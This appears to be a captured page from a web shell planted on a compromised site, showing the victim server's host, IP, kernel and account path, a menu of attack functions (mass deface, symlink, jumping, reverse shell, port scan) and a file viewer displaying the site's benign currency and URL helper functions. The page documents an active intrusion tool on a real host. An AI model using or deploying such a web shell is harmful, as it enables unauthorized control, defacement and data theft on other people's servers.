Tul xxx Tul
User / IP
:
216.73.216.217
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
piscina
/
app
/
helpers
/
Viewing: functions.php
<?php use App\Core\Config; function base_url(string $path = ''): string { return Config::baseUrl() . ltrim($path, '/'); } function asset(string $path): string { return base_url('public/' . ltrim($path, '/')); } function currency_symbol(): string { return 'C$'; } function format_currency(float|int $amount, int $decimals = 0): string { return currency_symbol() . ' ' . number_format($amount, $decimals, ',', '.'); } function format_time_12h(?string $time): string { if ($time === null || trim($time) === '') { return ''; } try { $dateTime = new \DateTime($time); } catch (\Throwable $e) { return $time; } return $dateTime->format('h:i A'); }
Coded With 💗 by
0x6ick